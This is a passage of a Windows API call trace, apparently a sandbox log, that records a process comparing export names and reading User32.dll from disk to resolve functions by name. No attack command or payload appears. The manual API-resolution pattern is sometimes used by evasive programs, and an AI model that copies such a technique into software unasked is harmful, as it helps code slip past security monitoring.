(lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0127.709] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0127.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0127.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0127.710] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0127.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0127.711] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0127.711] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0127.711] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0127.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0127.712] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0127.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0127.713] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0127.713] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0127.713] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0127.713] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0127.713] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0127.713] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0127.713] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0127.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0127.714] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0127.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0127.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0127.715] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0127.716] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0127.716] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0127.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0127.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0127.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0127.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0127.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0127.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0127.718] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0127.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0127.719] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0127.719] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0127.719] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0127.719] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0127.997] GetProcessHeap () returned 0x590000 [0127.997] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x590000) returned 1 [0127.997] GetProcessHeap () returned 0x590000 [0127.997] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a92a0 [0127.997] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0127.997] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0127.998] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0127.998] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0127.998] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.999] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0127.999] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0127.999] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0128.225] GetProcessHeap () returned 0x590000 [0128.225] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1555b8) returned 0x40c7040 [0128.229] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0128.229] ReadFile (in: hFile=0x17c, lpBuffer=0x40c7040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c7040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0129.855] CloseHandle (hObject=0x17c) returned 1 [0129.855] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0129.856] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0129.856] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0129.856] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0129.856] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0129.856] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0129.856] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0129.856] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0129.856] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0129.856] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0129.856] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0129.856] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0129.856] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0129.856] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0129.856] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0129.856] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0129.856] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0129.856] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0129.856] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0129.856] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0129.856] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0129.857] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0129.857] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0129.857] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0129.857] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0129.857] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0129.857] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0129.857] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0129.857] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0129.857] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0129.857] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0129.857] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0129.857] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0129.857] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0129.857] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0129.857] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0129.857] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0129.857] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0129.857] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0129.857] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0129.857] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0129.858] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0129.858] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0129.858] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0129.858] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0129.858] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0129.858] lstrcmpA 